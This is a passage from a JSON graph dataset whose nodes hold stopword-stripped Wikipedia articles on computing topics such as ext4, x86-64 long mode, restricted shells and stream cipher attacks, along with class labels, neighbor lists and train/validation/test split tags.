      2345,
      10026,
      10029,
      7983,
      823,
      4409,
      7483,
      11075,
      7494,
      4423,
      5457,
      11601,
      3413,
      10590,
      2399,
      7523,
      6502,
      8551,
      5492,
      1399,
      10104,
      2943,
      2432,
      7561,
      394,
      3978,
      7057,
      11667,
      8092,
      421,
      3496,
      11184,
      6075,
      6078,
      9151,
      9665,
      8136,
      969,
      4055,
      989,
      5600,
      1515,
      5612,
      6128,
      499,
      5619,
      3573,
      11257,
      10235,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 243,
    "label": 1,
    "text": "Indian_Genetic_Disease_Database:indian genetic disease database indian genetic disease database igdd first patient based genetic disease database india developed maintained indian institute chemical biology iicb unit council scientific industrial research first version database published online divided 19 disease categories 1st version database includes blood related disorders bone joints related growth disorders eye disorders gastro-intestinal disorders hearing disorders lysosomal disorders multi-system disorders muscle related disorders neurological disorders pigmentary disorders skin related disorders india country many communities high load genetic disorders due consanguineous marriage marriages close relatives practiced community database keeps track mutations causal genes genetic diseases common india database helpful physicians geneticists professionals india abroad related genetic disorders retrieve use information benefit mankind database launched updated august 2010 database one obtain patient-based data respect patient geographical location age sex ethnic group one also compare occurrence disease parts world database mode inheritance particular disease also known database one also get overall picture particular disease occurrence india details database disease represented gene name chromosome location mutations geospatial distribution disease 1st version database 52 diseases information 5,760 individuals database information 109 genetic diseases publication selected featured article nucleic acid research peer reviewed international journal nar 2011 patient specific mutation information updated simply filling form link",
    "neighbors": [
      2901
    ],
    "mask": "Validation"
  },
  {
    "node_id": 244,
    "label": 1,
    "text": "Multivalued_dependency:multivalued dependency according database theory multivalued dependency full constraint two sets attributes relation contrast functional dependency multivalued dependency requires certain tuples present relation therefore multivalued dependency special case tuple-generating dependency multivalued dependency plays role 4nf database normalization multivalued dependency special case join dependency two sets values involved i.e binary join dependency multivalued dependency exists least three attributes like x z relation value x well defined set values well defined set values z however set values independent set z vice versa formal definition given follows let formula_1 relational schema let formula_2 formula_3 subsets multivalued dependency formula_4 read formula_5 multidetermines formula_6 holds formula_1 legal relation formula_8 pairs tuples formula_9 formula_10 formula_11 formula_12 exist tuples formula_13 formula_14 formula_11 formula_16 br formula_17 br formula_18 br formula_19 br formula_20 br simple words condition expressed follows denote formula_21 tuple values formula_22 formula_23 formula_24 collectively equal formula_25 formula_26 formula_27 correspondingly whenever tuples formula_28 formula_29 exist formula_11 tuples formula_31 formula_32 also exist formula_11 consider example relation university courses books recommended course lecturers teaching course lecturers attached course books attached course independent database design multivalued dependency add new book aha course would add one record lecturers course vice versa br put formally two multivalued dependencies relation course formula_34 book equivalently course formula_34 lecturer br databases multivalued dependencies thus exhibit redundancy database normalization fourth normal form requires every nontrivial multivalued dependency x formula_34 x superkey multivalued dependency x formula_34 trivial subset x formula_38 whole set attributes relation following also involve functional dependencies rules sound complete",
    "neighbors": [
      5795,
      2025,
      1292,
      10326,
      4376,
      4281,
      3004
    ],
    "mask": "None"
  },
  {
    "node_id": 245,
    "label": 4,
    "text": "Extranet:extranet extranet controlled private network allows access partners vendors suppliers authorized set customers – normally subset information accessible organization intranet extranet similar dmz provides access needed services authorized parties without granting access organization entire network historically term occasionally also used sense two organizations sharing internal networks virtual private network vpn late 1990s early 2000s several industries started use term 'extranet describe centralized repositories shared data supporting applications made accessible via web authorized members particular work groups example geographically dispersed multi-company project teams applications offered software service saas basis example construction industry project teams may access project extranet share drawings photographs documents use online applications mark-up make comments manage report project-related communications 2003 united kingdom several leading vendors formed network construction collaboration technology providers ncctp promote technologies establish data exchange standards different data systems type construction-focused technologies also developed united states australia mainland europe",
    "neighbors": [
      1792,
      9632,
      5608,
      8649,
      7370,
      9672,
      433,
      467,
      4725,
      5749
    ],
    "mask": "Test"
  },
  {
    "node_id": 246,
    "label": 6,
    "text": "Ext4:ext4 ext4 journaling file system fourth extended filesystem journaling file system linux developed successor ext3 default file system linux distributions ext4 initially series backward-compatible extensions ext3 many originally developed cluster file systems lustre file system 2003 2006 meant extend storage limits add performance improvements however linux kernel developers opposed accepting extensions ext3 stability reasons proposed fork source code ext3 rename ext4 perform development without affecting current ext3 users proposal accepted 28 june 2006 theodore ts ext3 maintainer announced new plan development ext4 preliminary development version ext4 included version 2.6.19 linux kernel 11 october 2008 patches mark ext4 stable code merged linux 2.6.28 source code repositories denoting end development phase recommending ext4 adoption kernel 2.6.28 containing ext4 filesystem finally released 25 december 2008 15 january 2010 google announced would upgrade storage infrastructure ext2 ext4 14 december 2010 google also announced would use ext4 instead yaffs android 2.3 2008 principal developer ext3 ext4 file systems theodore ts stated although ext4 improved features major advance uses old technology stop-gap ts believes btrfs better direction offers improvements scalability reliability ease management btrfs also number design ideas reiser3/4 however ext4 continued gain new features file encryption metadata checksums ext4 file system honor secure deletion file attribute supposed cause overwriting files upon deletion patch implement secure deletion proposed 2011 solve problem sensitive data ending file system journal delayed allocation changes behavior programmers relying ext3 feature poses additional risk data loss cases system crashes loses power data written disk due ext4 kernel versions 2.6.30 later automatically handles cases ext3 typical scenario might occur program replacing contents file without forcing write disk fsync two common ways replacing contents file unix systems using codice_14 often reduce risk ext4 could lead performance penalties ext3 filesystems mounted codice_15 flag default linux distributions given file systems use time complicates matters end-user application developers response ext4 linux kernels 2.6.30 newer detect occurrence common cases force files allocated immediately small cost performance provides semantics similar ext3 ordered mode increases chance either version file survive crash new behavior enabled default disabled noauto_da_alloc mount option new patches become part mainline kernel 2.6.30 various distributions chose backport 2.6.28 2.6.29 patches n't completely prevent potential data loss help new files way safe write use software codice_14 needs performance problems minimized limiting crucial disk writes need codice_14 occur less frequently linux kernel virtual file system subsystem layer inside linux kernel result serious attempt integrate multiple file systems orderly single structure key idea dates back pioneering work done sun microsystems employees 1986 abstract part file system common file systems put code separate layer calls underlying concrete file systems actually manage data system calls related files pseudo files directed linux kernel virtual file system initial processing calls coming user processes standard posix calls codice_18 codice_19 codice_20 codice_21 etc ext4 yet much support ext2 ext3 non-linux operating systems ext2 ext3 stable drivers ext2ifs yet available ext4 possible create compatible ext4 filesystems disabling extents feature sometimes specifying inode size another option using ext4 windows use ext2fsd open-source driver supports writing ext4 partitions limited journaling viewing copying files ext4 windows even extents enabled also possible ext2read software recently paragon released commercial product extfs windows allows read/write capabilities ext2/3/4 macos full ext2/3/4 read–write capability paragon extfs software commercial product free software ext4fuse read-only support limited functionality",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      10272,
      9249,
      9762,
      2597,
      5158,
      3640,
      7225,
      2107,
      11323,
      7229,
      8254,
      8772,
      3662,
      1109,
      8285,
      10851,
      4708,
      8298,
      9836,
      7789,
      9839,
      6768,
      9333,
      6263,
      9335,
      3708,
      2687,
      9343,
      5256,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      6808,
      6297,
      11419,
      3745,
      6309,
      1190,
      5286,
      10405,
      7339,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      4841,
      8938,
      10985,
      1263,
      1775,
      3312,
      3826,
      2291,
      2804,
      3834,
      8700,
      3328,
      5892,
      11012,
      2314,
      8461,
      6416,
      1810,
      3859,
      6935,
      11033,
      798,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      11568,
      6961,
      6963,
      1844,
      823,
      6970,
      9533,
      11072,
      3909,
      2378,
      11082,
      4431,
      5969,
      3923,
      5975,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      7540,
      11638,
      6519,
      376,
      11128,
      890,
      11135,
      7554,
      8075,
      7565,
      6545,
      11667,
      5013,
      4506,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      11184,
      8114,
      7603,
      8631,
      1464,
      1978,
      2494,
      8643,
      7126,
      1501,
      2015,
      7136,
      1509,
      9189,
      492,
      10732,
      7663,
      5106,
      2036,
      11256,
      2555,
      3068,
      3582
    ],
    "mask": "Validation"
  },
  {
    "node_id": 247,
    "label": 7,
    "text": "Semantic_grid:semantic grid semantic grid approach grid computing information computing resources services described using semantic data model model data metadata expressed facts small sentences becoming directly understandable humans makes easier resources discovered combined automatically create virtual organizations vos descriptions constitute metadata typically represented using technologies semantic web resource description framework rdf like semantic web semantic grid defined extension current grid information services given well-defined meaning better enabling computers people work cooperation notion semantic grid first articulated context e-science observing approach necessary achieve high degree easy-to-use seamless automation enabling flexible collaborations computations global scale use semantic web knowledge technologies grid applications sometimes described knowledge grid semantic grid extends also applying technologies within grid middleware semantic grid activities coordinated semantic grid research group global grid forum",
    "neighbors": [
      5956,
      10452,
      5525,
      119,
      8122,
      4091
    ],
    "mask": "Test"
  },
  {
    "node_id": 248,
    "label": 1,
    "text": "National_Monuments_Record_of_Scotland:national monuments record scotland national monuments record scotland nmrs term used archive sites monuments buildings scotland past maintained royal commission ancient historical monuments scotland commission originally established royal warrant reign george vi make inventory ancient historical monuments constructions connected illustrative contemporary culture civilization conditions life people scotland earliest times year 1707 specify seem worthy preservation separate name archive longer given prominence rcahms corporate publications term national record historic environment preferred nmrs created scottish national buildings record founded 1942 transferred rcahms 1966 240,000 archaeological sites monuments buildings recorded canmore nmrs database nmrs also holds collection photographs drawings manuscripts",
    "neighbors": [
      1868
    ],
    "mask": "Test"
  },
  {
    "node_id": 249,
    "label": 3,
    "text": "Unicore:unicore unicore name computer instruction set architecture designed microprocessor research development center mprc peking university prc computer built architecture called unity-863 cpu integrated fully functional soc make pc-like system processor similar arm architecture uses different instruction set supported linux kernel version 2.6.39 instructions almost identical standard arm formats except conditional execution removed bits reassigned expand register specifiers 5 bits likewise immediate format 9 bits rotated 5-bit amount rather 8 bit rotated 4 load/store offset sizes 14 bits byte/word 10 bits signed byte half-word conditional moves provided encoding condition unused arm second source register field rn mov mvn instructions meaning various flag bits s=1 enables setting condition codes identical arm instruction set load/store multiple instruction access half register set depending h bit h=0 16 bits indicate r0–r15 h=1 r16–r31",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      10796,
      3630,
      4144,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      7313,
      9371,
      8861,
      6815,
      8352,
      5793,
      6818,
      6821,
      6311,
      682,
      7852,
      4269,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      6352,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      8700,
      8450,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2339,
      5414,
      6950,
      3886,
      309,
      8501,
      823,
      5948,
      4928,
      8514,
      5956,
      3911,
      4423,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      8048,
      4465,
      10612,
      1399,
      7033,
      1402,
      3451,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      3493,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1462,
      1463,
      7607,
      8122,
      4030,
      6084,
      453,
      3014,
      6607,
      466,
      2517,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      2039,
      10746,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 250,
    "label": 4,
    "text": "ARNES:arnes academic research network slovenia public institute slovenia established may 1992 main task development operation management communication information network education research arnes also operates slovenian internet exchange members management board appointed government slovenia also part arnes si-cert slovenian computer emergency response team established 1994 led gorazd božič si-cert involved take-down recordings government slovenia closed session recordings leaked december 2011 youtube recordings taken youtube copyright-related lawsuit threat si-cert involved investigation leak",
    "neighbors": [
      4435
    ],
    "mask": "None"
  },
  {
    "node_id": 251,
    "label": 6,
    "text": "StegFS:stegfs stegfs free file system linux licensed gpl principally developed andrew d. mcdonald markus g. kuhn steganographic file system based ext2 filesystem last version stegfs 1.1.4 released february 14 2001 development release known bugs file corruption bug stable release last website activity 2004 2003 andreas c. petter sebastian urbach intended continue development stegfs created site sourceforge.net development moved using fuse library working releases available development homepage",
    "neighbors": [
      8640,
      9281,
      2050,
      7139,
      9762,
      6309,
      10631,
      4746,
      8331,
      302,
      7983,
      8627,
      2197,
      5749,
      823,
      8283,
      6519
    ],
    "mask": "Train"
  },
  {
    "node_id": 252,
    "label": 2,
    "text": "Utopia_bootdisk:utopia bootdisk utopia bootdisk booting program released june 22 2000 created warez group utopia designed playing pirated sega dreamcast games standard cd-r discs bootdisk also allows play imported official dreamcast gd-roms bypassing dreamcast region lockout utopia bootdisk defeat security used original gd-rom disks instead uses alternative boot method dreamcast bios originally intended use mil-cds loaded standard dreamcast screen display spinning 3-d rendering reindeer alongside message insert disc new disc inserted dreamcast lid closed disc boots eventually bootdisk rendered obsolete self-booting pirate releases—games released mil-cd format could boot without need utopia bootdisk bootdisk developed using pirated version sega katana sdk code render reindeer taken early dreamcast teapot demo",
    "neighbors": [
      1515,
      6587
    ],
    "mask": "Test"
  },
  {
    "node_id": 253,
    "label": 7,
    "text": "Mirantis:mirantis mirantis inc. campbell california based b2b cloud computing services company focuses development support kubernetes openstack company founded 1999 alex freedland boris renski one founding members openstack foundation non-profit corporate entity established september 2012 promote openstack software community openstack open source software platform cloud computing infrastructures coordinated openstack foundation promote development distribution adoption openstack cloud software mirantis top contributor openstack project mirantis works clients build open private public service-provider cloud solutions based openstack using open source tools integrate computing network storage capabilities define openstack infrastructure wall street journal characterizes openstack providing kind dashboard help manage large numbers servers storage networking devices like single resource mirantis sells commercial version helps customers develop install software two rounds fund-raising january june 2013 mirantis raised 10 million funding intel capital westsummit capital 10 million red hat ericsson sapphire ventures october 2014 mirantis raised 100 million series b financing round led insight venture partners joined existing investors intel capital westsummit capital telefonaktiebolaget l.m ericsson sapphire ventures august 2015 intel led additional 100 million funding round new investor goldman sachs existing investors august capital insight venture partners ericsson sapphire ventures westsummit capital mirantis announced openstack distribution october 2013 competition distributions red hat hewlett-packard others mirantis openstack distribution works various operating systems including red hat centos ubuntu linux delivery form-factors mirantis openstack include mirantis nfv reference platform reference architecture mirantis openstack designed efficiently host orchestrate scale virtualized network functions ways compatible etsi-nfv specification mirantis unlocked appliances first offered july 2015 turn-key scalable modular racks mirantis openstack pre-installed pre-tested select hardware reference configurations optimized different workload types sold supported collaboration mirantis certified rack partners first unlocked appliance cloud native apps incorporated hardware software dell juniper intel early 2017 mirantis changed focus offer managed solutions based number open source infrastructure platforms including openstack mirantis debuted first kubernetes-related offering december 2016 introduced vendor-agnostic training certification kubernetes docker container platforms company released mirantis cloud platform combines openstack kubernetes follows build-operate-transfer delivery model april 2017 mirantis cloud platform utilizes continuous integration continuous delivery toolchain known drivetrain perform continuous incremental updates eliminate need major upgrades platform mirantis announced mirantis cloud platform containers-as-a-service enables users provision kubernetes clusters across multiple clouds private infrastructure and/or public clouds including amazon web services september 2017 addition containers-as-a-service mirantis cloud platform supports hybrid clouds drivetrain providing “ consistent tooling managing lifecycle openstack kubernetes on-premises aws mirantis continues shift exclusive openstack focus continuous integration continuous delivery kubernetes combinations open source cloud software tooling forms basis company ’ vision “ cloud-native continuous delivery ” platform multi-cloud solutions mirantis launched mirantis application platform continuous delivery platform kubernetes april 2018 mirantis edge computing platform launched october 2018 based kubernetes targeted towards telecommunications providers may 2019 company announced bring distro initiative offers enterprise support multiple kubernetes distributions targeting organizations already deployed kubernetes production including many extending kubernetes way makes challenging operations teams support mirantis founders alex freedland ceo boris renski cmo served openstack foundation board boris renski recently re-elected january 2018 mirantis major contributor code openstack ranking 3 contributor time commits lines code mirantis contributes many core openstack projects mitaka newton releases mirantis ranked 1 contributor lines code company led projects openstack core big tent including mirantis largest code-contributor openstack newton lines code 32 lines code recorded 2016 mirantis started becoming significant contributor code open infrastructure-related projects well including kubernetes ceph opencontrail prometheus opnfv 2019 mirantis announced joined airship open source project automating provisioning clouds part effort accelerate deployment kubernetes bare-metal servers employ drive 5g networking services 2016 mirantis acquired tcp cloud czech startup developed managed services openstack expertise kubernetes containers top contributor opencontrail",
    "neighbors": [
      1539,
      526,
      4623,
      10265,
      5662,
      5666,
      9766,
      39,
      5159,
      3121,
      5681,
      10820,
      4683,
      590,
      1102,
      7248,
      5202,
      4194,
      5732,
      2170,
      4236,
      10893,
      6307,
      2217,
      9906,
      7352,
      4289,
      3269,
      1224,
      5332,
      6367,
      2795,
      3819,
      9455,
      8446,
      8451,
      5384,
      272,
      2328,
      4377,
      8986,
      11038,
      6444,
      8495,
      11070,
      8515,
      8520,
      4429,
      1362,
      7512,
      2910,
      3428,
      10090,
      8044,
      5499,
      11646,
      6018,
      6027,
      911,
      1935,
      8592,
      405,
      2965,
      10681,
      448,
      2496,
      11201,
      7628,
      9682,
      467,
      10200,
      6618,
      6632,
      1001,
      7660,
      3582,
      8191
    ],
    "mask": "None"
  },
  {
    "node_id": 254,
    "label": 2,
    "text": "Live_Connect:live connect live connect previously messenger connect live services windows live dev collection apis common controls allow developers deeper control offers access core windows live services data open easily accessible application programming interfaces apis mix07 microsoft senior architect danny thorpe described live connect built standard web technologies oauth 2.0 representational state transfer rest javascript object notation json designed work technology device including asp.net microsoft silverlight in-browser out-of-browser models windows presentation foundation wpf adobe flash php java live connect released june 24 2010 part windows live wave 4 release known messenger connect unites previously separate apis windows live windows live id windows live contacts windows live messenger web toolkit others single api based industry standards specifications september 13 2011 messenger connect renamed live connect brings additional apis onedrive outlook contacts calendars well adding xmpp support messenger service live connect provides variety ways developers integrate applications live connect used websites desktop applications well windows 8 metro-style apps developers may select several different types integration covering variety scenarios including live connect include following capabilities websites applications devices addition microsoft also offers windows live client extensibility apis windows live client software windows live photo gallery writer messenger apis separate live connect includes following capabilities",
    "neighbors": [
      4704,
      5057,
      10242,
      1348,
      8644,
      11559,
      6750,
      10986,
      2443,
      2046
    ],
    "mask": "Test"
  },
  {
    "node_id": 255,
    "label": 9,
    "text": "Long_mode:long mode x86-64 computer architecture long mode mode 64-bit operating system access 64-bit instructions registers 64-bit programs run sub-mode called 64-bit mode 32-bit programs 16-bit protected mode programs executed sub-mode called compatibility mode real mode virtual 8086 mode programs natively run long mode x86-64 processor acts identically ia-32 processor running real mode protected mode supported sub-modes processor long mode bit cpuid extended attributes field informs programs real protected modes processor go long mode allows program detect x86-64 processor similar cpuid attributes bit intel ia-64 processors use allow programs detect running ia-32 emulation computer powered cpu starts real mode begins booting computer running traditional bios 64-bit operating system checks switches cpu long mode starts new kernel-mode threads running 64-bit code computer running uefi computer switches long mode soon booting transferring control operating system register sizes increased 64 bits previous x86 architecture memory addressing yet increased full 64 bits time impractical equip computers sufficient memory require full 64 bits long remains case load/store unit cache tags mmus tlbs simplified without loss usable memory despite limitation software programmed using full 64-bit pointers therefore able use progressively larger address spaces become supported future processors operating systems first cpus implementing x86-64 architecture namely amd athlon 64 opteron k8 cpus 48-bit virtual 40-bit physical addressing virtual address space processors divided two 47-bit regions one starting lowest possible address extending largest attempting use addresses falling outside range cause general protection fault limit physical addressing constrains much installed ram able accessed computer ccnuma multiprocessor system opteron includes memory installed remote nodes cpus directly address cache memory regardless home node remote 1 tb limit 40-bit physical memory k8 huge typical personal computer standards might limitation use supercomputers consequently k10 10h microarchitecture implements 48-bit physical addresses address 256 tb ram need microarchitecture expanded step step without side-effects software simultaneously save cost implementation future expansion architecture supports expanding virtual address space 64 bits physical memory addressing 52 bits limited page table entry format would allow processor address 2 bytes 16 exabytes virtual address space 2 bytes 4 petabytes physical address space",
    "neighbors": [
      5380,
      389,
      6924,
      398,
      10786,
      7983,
      9525,
      9911,
      1848,
      6078,
      6596,
      585,
      6730,
      9932,
      2383,
      7377,
      11601,
      4695,
      5080,
      7134,
      1247,
      1515,
      5356,
      11499,
      10734,
      499,
      3702,
      7039
    ],
    "mask": "None"
  },
  {
    "node_id": 256,
    "label": 3,
    "text": "E_(programming_language):e programming language e object-oriented programming language secure distributed computing created mark s. miller dan bornstein others electric communities 1997 e mainly descended concurrent language joule original-e set extensions java secure distributed programming e combines message-based computation java-like syntax concurrency model based event loops promises ensures deadlock never occur e language designed secure computing mind accomplished chiefly strict adherence object-oriented computing model pure form properties support secure computing e language standard library employ capability-based design philosophy throughout order help programmers build secure software enable software components co-operate even n't fully trust e object references serve capabilities hence capabilities add computational conceptual overhead costs language syntax designed easy people audit security flaws example lexical scoping limits amount code examined effects given variable another example language uses == operator comparison operator assignment avoid possibility confusion operator e values objects computation performed sending messages objects object belongs vat analogous process vat single thread execution stack frame event queue distributed programming matter sending messages remote objects objects vats communication remote parties encrypted e runtime arriving messages placed vat event queue vat event loop processes incoming messages one one order arrival e two ways sending messages immediate call eventual send immediate call like typical function method call non-concurrent language sender waits receiver finishes returns value eventual send sends message producing placeholder result called promise sender proceeds immediately promise later receiver finishes yields result promise resolves result since eventual sends allowed communicating remote objects deadlocks happen distributed systems promise mechanism also minimizes delays caused network latency e syntax similar java though also bears resemblance python pascal variables dynamically typed lexically scoped unlike java python however e composed entirely expressions extremely simple e program recursive function computing factorial number written e. functions defined using def keyword first line int guard constrains argument result function guard quite thing type declaration guards optional specify constraints first int ensures body function handle integer argument without second int function would able return value able see front information escapes function helpful security auditing since e intended support secure co-operation canonical example e programs mint simple electronic money system lines e. following code defines function makes mints mint currency mint make purses hold currency holder two purses currency securely transfer money purses quick examination source code e programmer easily verify mints may change amount money circulation money created destroyed mints create money currency holder purse change balance objects e defined def keyword within object definition keyword begins method guard expressions example illustrate specify value constraint int 0 0..balance mint example makes use built-in mechanism called sealer function makebrandpair creates two associated objects sealer unsealer sealer seal object box unsealer object retrieve contents box see e website detailed explanation money example",
    "neighbors": [
      9345,
      2951,
      9224,
      10510,
      6813,
      8221,
      3999,
      10146,
      5029,
      3629,
      5677,
      7983,
      7480,
      10043,
      10813,
      4034,
      10819,
      4423,
      7627,
      7884,
      8524,
      11596,
      10835,
      728,
      5729,
      11625,
      3178,
      5483,
      5612,
      8554,
      9195,
      3700,
      10614,
      2558,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 257,
    "label": 4,
    "text": "Minimum-Pairs_Protocol:minimum-pairs protocol minimum-pairs mp active measurement protocol estimate real-time smaller forward reverse one-way network delays owds designed work hostile environments set three network nodes estimate upper-bound owds fourth untrusted node four nodes must cooperate though honest cooperation fourth node required objective conduct estimates without involving untrusted nodes clock synchronization manner accurate simply half round-trip time rtt mp protocol used delay-sensitive applications placing cdn replicas secure internet geolocation mp protocol requires three trusted network nodes synchronize clocks securely access public keys could achieved closed public-key infrastructure pki system untrusted node needs follow suit assumed cooperate honestly estimate upper bound smaller forward reverse owd node untrusted node x see figure notation x first establishes application-layer connection three nodes could done transparently browser using e.g. web-sockets three nodes take turns exchanging digitally-signed timestamps assuming node begins sends signed timestamp x. node x forwards message two nodes message received receiving time recorded receiving node verifies signature calculates time took message traverse network originator recipient passing untrusted node done subtracting timestamp message receiving time node b repeats process followed node c. three nodes taken turns end-up six delay estimates corresponding links estimate smaller forward reverse owds three network links b c x minimum pairs taken i.e. larger discarded three pairs represents approximate smaller owd link generates system three equations three unknowns solving simultaneously b c see figure gives delay estimate assume actual delays e.g. millisecond node x nodes b c vice versa follows unknown delays need estimate smaller forward reverse three links example smaller 5ms 4ms 2ms links x three trusted nodes respectively b c nodes exchange timestamp messages see following system equations thus becomes results estimates smaller owds case absolute errors formula_7 formula_8 formula_9 three links respectively comparison average rtt would calculate owd three links 5.5ms 6ms 3ms resulting absolute errors 0.5ms 2ms 1ms respectively therefore mp protocol accurate example injecting artificial delays e.g. holding onto message little instead promptly forwarding enables untrusted node increase estimated owds mp protocol thus estimate upper bound owds three links collectively trusted nodes untrusted one example estimated delays forward reverse 30ms 40ms 50ms actual 60ms 70ms 80ms means untrusted node managed reduce three together hard achieve since delays bound physical characteristics transmission media note however untrusted node may case able reduce subset links selectively delaying links compared average i.e. rtt/2 mp protocol never returns estimate smaller forward reverse owd larger returned average method additionally probability distribution absolute error mp protocol derived function underlying delay distribution useful enables calculation expected error knowing nature delays links untrusted node trusted ones",
    "neighbors": [
      10368,
      9834,
      8302,
      10831
    ],
    "mask": "Test"
  },
  {
    "node_id": 258,
    "label": 2,
    "text": "Vino_(operating_system):vino operating system vino now-inactive project harvard university sought develop extensible-kernel operating system based netbsd also current project named vino hosted codeplex seeks develop java-based operating system similar concept legacy javaos 1990s vino group within harvard school engineering worked develop extensible unix-like operating system according project main web page essence vino fork ran intel 486 hardware platform netbsd time two alpha versions vino released bsd-like license — 0.40 december 1997 0.50 december 1998 software companion documentation currently available systems research harvard syrah group also maintains vino web pages",
    "neighbors": [
      5397
    ],
    "mask": "Test"
  },
  {
    "node_id": 259,
    "label": 9,
    "text": "Chakra_(JavaScript_engine):chakra javascript engine chakra javascript engine developed microsoft microsoft edge web browser fork jscript engine used internet explorer like edge layout engine unlike previous versions internet explorer declared intention reflect living web december 5 2015 announced core components chakra open-sourced chakracore chakra supports ecmascript 5.1 partial support ecmascript 6 following initial announcement december 5 2015 microsoft open sourced chakra engine chakracore including key components javascript engine powering microsoft edge github page mit license january 13 2016 chakracore essentially chakra engine powers microsoft edge browser platform-agnostic bindings i.e without specific interfaces utilised within windows universal app platform microsoft also created project github allows node.js use chakracore javascript engine instead v8",
    "neighbors": [
      1409,
      4356,
      11524,
      3462,
      6791,
      10507,
      6797,
      782,
      1935,
      10900,
      8854,
      4378,
      8605,
      11549,
      7455,
      7970,
      803,
      1832,
      6827,
      7983,
      3761,
      3890,
      11060,
      8757,
      438,
      5311,
      2880,
      4289,
      7871,
      9152,
      9033,
      4171,
      10957,
      11087,
      339,
      84,
      4051,
      4822,
      11221,
      4056,
      9560,
      11605,
      603,
      11103,
      482,
      5219,
      7396,
      10338,
      4326,
      487,
      617,
      8681,
      5483,
      9195,
      10991,
      10097,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 260,
    "label": 2,
    "text": "Restricted_shell:restricted shell restricted shell unix shell restricts capabilities available interactive user session shell script running within intended provide additional layer security insufficient allow execution entirely untrusted software restricted mode operation found original bourne shell later counterpart bash korn shell cases restricted shell used conjunction chroot jail attempt limit access system whole restricted mode bourne shell sh posix workalikes used interpreter invoked one following ways restricted mode bash used bash invoked one following ways similarly korn shell restricted mode produced invoking thus systems e.g. centos invocation enabled default user obtains error invoked directly login failure /etc/passwd file indicates user shell suffices create link named pointing directly though invokes directly without options recognize invoked come restricted shell accomplished following simple commands executed root either logged user root using sudo following operations permitted restricted shell bash adds restrictions including restrictions restricted korn shell much restricted bourne shell restricted shell secure user break restricted environment running program features shell function following example shell function vi used escape restricted shell simply starting new unrestricted shell demonstrated beyond restricted modes usual shells specialized restricted shell programs include",
    "neighbors": [
      1668,
      10631,
      5482,
      11442,
      10387,
      11001,
      8954,
      2717
    ],
    "mask": "None"
  },
  {
    "node_id": 261,
    "label": 1,
    "text": "Sublanguage:sublanguage sublanguage subset language sublanguages occur natural language computer language relational databases informatics natural language processing machine translation sublanguage language restricted domain particularly technical domain mathematical terms subset sentences language forms sublanguage language closed operations language e.g. two members subset operated resultant also member subset z. s. harris language information columbia u press 1988 p. 34 term sublanguage also sometimes used denote computer language subset another language sublanguage may restricted syntactically accepts subgrammar original language and/or semantically set possible outcomes given program subset possible outcomes original language instance algol 68s subset algol 68 designed make possible write single-pass compiler sublanguage sql structured query language statements classified various ways grouped sublanguages commonly data query language dql data definition language ddl data control language dcl data manipulation language dml relational database theory term sublanguage first used purpose e. f. codd 1970 refers computer language used define manipulate structure contents relational database management system rdbms typical sublanguages associated modern rdbms qbe query example sql structured query language 1985 codd encapsulated thinking twelve rules every database must satisfy order truly relational fifth rule known comprehensive data sublanguage rule states",
    "neighbors": [
      1952,
      1572,
      3556,
      7780,
      8262,
      9286,
      1611,
      10413,
      2901,
      987,
      7164,
      11327
    ],
    "mask": "Test"
  },
  {
    "node_id": 262,
    "label": 4,
    "text": "Stream_cipher_attacks:stream cipher attacks stream ciphers plaintext bits combined cipher bit stream exclusive-or operation xor secure used properly however vulnerable attacks certain precautions followed stream ciphers vulnerable attack key used twice depth two say send messages b length encrypted using key k stream cipher produces string bits c k length messages encrypted versions messages xor performed bit bit say adversary intercepted e e b easily compute however xor commutative property x xor x 0 self-inverse one message longer adversary truncates longer message size shorter attack reveal portion longer message words anyone intercepts two messages encrypted key recover xor b form running key cipher even neither message known long messages natural language cipher often broken paper-and-pencil methods world war ii british cryptanalyst john tiltman accomplished lorenz cipher dubbed tunny average personal computer ciphers usually broken matter minutes one message known solution trivial another situation recovery trivial traffic-flow security measures station sending continuous stream cipher bits null characters e.g ltrs baudot sent real traffic common military communications case transmission channel fully loaded good likelihood one ciphertext streams nulls nsa goes great lengths prevent keys used twice 1960s-era encryption systems often included punched card reader loading keys mechanism would automatically cut card half card removed preventing reuse one way avoid problem use initialization vector iv sent clear combined secret master key create one-time key stream cipher done several common systems use popular stream cipher rc4 including wired equivalent privacy wep wi-fi protected access wpa ciphersaber one many problems wep iv short 24 bits meant high likelihood iv would used twice thousand packets sent master key see birthday attack subjecting packets duplicated iv key reuse attack problem fixed wpa changing master key frequently suppose adversary knows exact content part one messages part man middle attack replay attack alter content message without knowing key k say example knows portion message say electronics fund transfer contains ascii string 1000.00 change 9500.00 xoring portion ciphertext string 1000.00 xor 9500.00 see works consider cipher text send c k xor 1000.00 new message adversary creating recall string xored produces zeros string zeros xored another string leaves string intact result c k xor 9500.00 ciphertext would 9500 correct amount see also malleability cryptography bit-flipping attacks prevented including message authentication code increase likelihood tampering detected stream ciphers combine secret key agreed initialization vector iv produce pseudo-random sequence time-to-time re-synchronized chosen iv attack relies finding particular iv 